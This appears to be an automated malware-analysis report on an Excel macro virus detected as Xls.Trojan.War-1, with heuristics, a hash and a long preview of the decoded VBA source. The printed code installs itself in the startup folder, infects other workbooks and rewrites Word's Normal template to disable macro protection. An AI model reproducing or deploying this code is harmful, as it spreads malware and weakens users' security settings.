MALICIOUS
Risk Score: 340
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1547.001 Registry Run Keys / Startup Folder
This Excel file contains VBA macros, including an Auto_Open macro, which is a common technique for executing malicious code upon opening the document. The script attempts to save a copy of itself to the user's startup directory as 'ALEVIRUSCS.XLM', indicating an attempt to establish persistence. The ClamAV detection 'Xls.Trojan.War-1' further supports its malicious nature.
Heuristics (7)
- ClamAV: Xls.Trojan.War-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.War-1
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12315 bytes |

SHA-256: f75a9e7a798b531d18a6f4305d8807d329027c4bfed4e70fed9fb08b8a41141a
Detection: ClamAV: Xls.Trojan.War-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Email"
'Primeiro Excel Virus Brasileiro Para Excel97 e Email e MIRC
'AlevirusS>C>S 1999!!
Sub Auto_Open()
On Error Resume Next
CommandBars("Tools").Controls("Macro").Enabled = 0
Call Email
Call Estupro
Call Mirc
Call Dia
MkDir "c:\Arquivos de programas\Microsoft Office\Office\XLINICIO"
MkDir "c:\Programs Files\Microsoft Office\Office\XLINICIO"
Application.ScreenUpdating = 0
Application.DisplayAlerts = 0
If Tudo() Then
GoTo SejaGay:
Else
NoOlho
End If
SejaGay:
Application.OnSheetActivate = "ALEVIRUSCS.XLM!Puta"
fui:
End Sub
Function Tudo() As Boolean
Tudo = False
For x = 1 To Application.Workbooks.Count
If Application.Workbooks(x).Name = "ALEVIRUSCS.XLM" Then
For y = 1 To Application.Workbooks("ALEVIRUSCS.XLM").Modules.Count
If Application.Workbooks("ALEVIRUSCS.XLM").Modules(y).Name = "Email" Then
Tudo = True
End If
Next y
End If
Next x
End Function
Function NoOlho()
activebook = ActiveWorkbook.Name
Workbooks(activebook).SaveCopyAs Application.StartupPath + "\ALEVIRUSCS.XLM"
Workbooks.Open (Application.StartupPath + "\ALEVIRUSCS.XLM")
Windows("ALEVIRUSCS.XLM").Visible = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
End Function
Function Amerda() As Boolean
activebook = ActiveWorkbook.Name
Amerda = False
For y = 1 To Application.Workbooks(activebook).Modules.Count
If Application.Workbooks(activebook).Modules(y).Name = "Email" Then
Amerda = True
End If
Next y
End Function
Sub Puta()
oactivebook = ActiveWorkbook.Name
If Amerda() Then
GoTo cya
Else
End If
Application.ScreenUpdating = False
Application.Windows("ALEVIRUSCS.XLM").Visible = True
Workbooks("ALEVIRUSCS.XLM").Activate
Sheets("Email").Visible = True
Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Copy Before:=Workbooks(oactivebook).Sheets(1)
Workbooks(oactivebook).Sheets("Email").Visible = False
Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Visible = False
Windows("ALEVIRUSCS.XLM").Visible = False
cya:
Close
End Sub
Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\WAR3.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\SEXO.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\FONE.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\AVP.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\CAIXA.XLS"
Call Dia
End Sub
Private Sub Estupro()
On Error Resume Next
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
Quit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
If InStr(1, NT.Lines(1, 1), "'AlevirusSCS<>EMAIL<>Excel<>Virus<>BRASIL<>1999!") Then
WordObj.Run "Normal.ThisDocument.AutoExec"
Else
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Sub AutoExec()"
NT.InsertLines 2, "On Error Resume Next"
NT.InsertLines 3, "Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)"
NT.InsertLines 4, "WordBasic.MkDir ""c:\Alevirus99"""
NT.InsertLines 5, "WordBasic.CopyFile ""c:\windows\win.com"", ""c:\Alevirus99\win.com"""
NT.InsertLines 6, "WordBasic.Kill ""c:\Alevirus99\*.*"""
NT.InsertLines 7, "WordBasic.RmDir ""c:\Alevirus99"""
NT.InsertLines 8, "System.ProfileString(""Options"", ""EnableMacroVirusProtection"") = ""0"""
NT.InsertLines 9, "WordBasic.MkDir ""c:\Alevirus99"""
NT.InsertLines 10, "WordBasic.CopyFile ""c:\windows\win.com"", ""c:\Alevirus99\win.com"""
NT.InsertLines 11, "WordBasic.Kill ""c:\Alevirus99\*.*"""
NT.InsertLines 12, "WordBasic.RmDir ""c:\Alevirus99"""
NT.InsertLines 13, "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 14, "WordBasic.MkDir ""c:\Alevirus99"""
NT.InsertLines 15, "WordBasic.CopyFile ""c:\windows\win.com"", ""c:\
... (truncated)